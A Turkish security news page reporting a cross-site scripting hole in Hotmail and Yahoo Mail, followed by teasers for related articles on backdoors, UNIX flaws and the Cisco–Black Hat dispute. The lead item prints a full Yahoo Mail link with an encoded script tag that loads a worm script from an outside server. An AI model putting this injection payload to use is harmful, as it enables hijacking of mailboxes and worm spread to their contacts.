Hotmail ve Yahoomail virus tehdidi altında

0
conan
Web tabanlı email servislerinde yeni saptanan bir açık Melissa tipi virüslerin yayılmasına neden olabiliyor.
Açık kısaca şöyle tanımlanıyor. Kötü niyetli kullanıcı emailinin içerisinde web tabanlı servisin serverının bir linkini yerleştiriyor. Bu linkin ucunda ise kişinin inbox'ını gezebilecek ve de bu inbox'da gördüğü her email'e kötü niyetli bir kod yollayabilecek bir Javascript var.
Yahoomail için link örneği: http://us.f117.mail.yahoo.com/ym/ShowFolder?ET=1&YY=12345&inc=10&order=asd%22%3E%3Cscript%20language%3D%22Javascript%22%20src%3D%22http%3A//www.sidesport.com/webworm/webmailworm.js%22%3E%3C/script%3E%3C%22asd

Gelelim işin asıl önemli boyutuna. Email içinde verilen link ile web tabanlı email servisinin serverının adresi aynı olduğundan (domain bazında) bu link hiçbir güvenlik yorumundan geçmeden kullanıcıya sunuluyor. (no domain bounding error) 2 haziran itibari ile her iki büyük web mail servisi de bu sorunu yamamış gibi gözüküyor.

Ayrıntılı bilgi:
- SideSport: Sorunu bulan kişinin sitesi
- SecurityFocusda bu konudaki haber

İlgili Yazılar

Akşam'ın bilgisayar eki!

sundance

Bugünden itibaren Akşam gazetesi her hafta, özellikle yeni başlayanları hedef alan 32 sayfalık bir ek çıkartacak.

Internet'ten Linux'a birçok konunun işlendiği bu ekte Fazlamesai ekibi olarak Güvenlik bölümünden sorumlu olacağız. İşlememizi isteyeceğiniz konularda önerilerinizi ve eleştirilerinizi bekliyoruz.

Kötü adamlar ve arka kapılar

sundance

Uzun bir süreden beri (Truvalılardan bu yana ;) hileli oyuncaklar hep güncelliğini korumuşlardır. Truva şehrinin düşmesinden, James Bond numaraları ile çeşitli sırları ele geçiren casuslara kadar tarih boyunca, asıl amacını gizleyen aletler hep büyük avantaj olmuştur.

Son yirmi yılda ise, bilgisayarın ve ağların yaygınlaşması ile, bu eski hileli savaş araçlarının yerini sistemdeki zayıflıklar, belli bir işi görüyormuş gibi davranan ama arka planda başka numaralar çeviren programlar almıştır. Tacettin Karadeniz arkadaşımız da, sözkonusu zayıflıkları sağlayan Arkakapıları [Backdoor] anlatan enfes bir makale yazmış, ilgi ile okuyoruz.

UNIX ile ilgili güvenlik problemleri

FZ

Internet Security Systems (ISS) geçen hafta yaptığı bir açıklama ile pek çok büyük ticari UNIX sisteminin güvenlik açığı bulunduğunu belirtti.

Konu ile ilgili olarak HP ve Sun Microsystems firmalarının yoğun eleştirilerine ve "yok bizim sistemlerin öyle bir problemi, atıyorsun" tarzı demeçlerine maruz kalan ISS iddia ettiği problemlerin varlığı konusunda iddialı ve sistem yöneticilerini uyarmaya devam etmekte ısrarlı.

İçeriği yönetmek ya da nasıl adam susturulur?

sundance

SFgate.com'da yeralan bir göre habere göre Black Hat 2005'de yapılacak bir sunumu durdurmak için Cisco oldukça yoğun çaba harcamış.

Cisco IOS üzerindeki önemli bir açıkla ilgili sunum yapacak olan ISS çalışanı Michael Lynn, Cisco ve çalıştığı şirket tarafından bu sunumu yapmaması konusunda uyarıldı, akabinde Cisco'nun kiraladığı elemanlar binlerce konferans dosyasından yirmi sayfayı teker teker çıkartıp, konferans sunumlarıyla ilgili cdyi de değiştirdiler. Bunun üzerine Michael Lynn, ISS'den istifa edip, işsiz birisi olarak yine de sunumunu yaptı.

URL Parametrelerini doğru kullanmayınca başa gelenler

tongucyumruk

Hep ciddi ciddi şeyler yazacak değiliz, biraz da eğlenelim. Bazen (düzeltme: çoğu zaman) en büyük şirketler dahi web üzerinde birşeyler yaparken en basit güvenlik önlemlerini unutabiliyorlar. İşte bu sefer madara olan şirketimiz de sürekli olarak geliştiricilerin ahını almaktan çekinmeyen Oracle. Bu linke tıklayarak kendilerinin URL parametrelerini hiçbir doğrulamadan geçirmeden doğrudan...